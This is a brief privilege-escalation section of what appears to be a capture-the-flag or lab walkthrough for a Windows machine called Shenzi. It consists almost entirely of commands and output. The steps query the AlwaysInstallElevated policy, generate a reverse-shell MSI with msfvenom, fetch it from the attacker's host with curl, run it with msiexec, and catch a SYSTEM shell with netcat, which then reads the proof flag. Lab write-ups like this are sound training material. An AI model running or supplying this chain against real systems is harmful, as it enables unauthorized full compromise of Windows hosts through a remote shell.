Priv Esc

PS C:\Shenzi> reg query HKCU\Software\Policies\Microsoft\Windows\Installer

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.239 LPORT=1337 -f msi -o pwned.msi

PS C:\programdata> curl 192.168.45.239/pwned.msi -o pwned.msi
PS C:\programdata> msiexec /i pwned.msi

$ nc -lnvp 1337                                  
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.177.55] 50544
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nt authority\system
67a413a96b7e358d160a17435865b709

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.177.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.177.254

PreviousEnumeration NextCredentials / Notes / LL

Last updated 9 months ago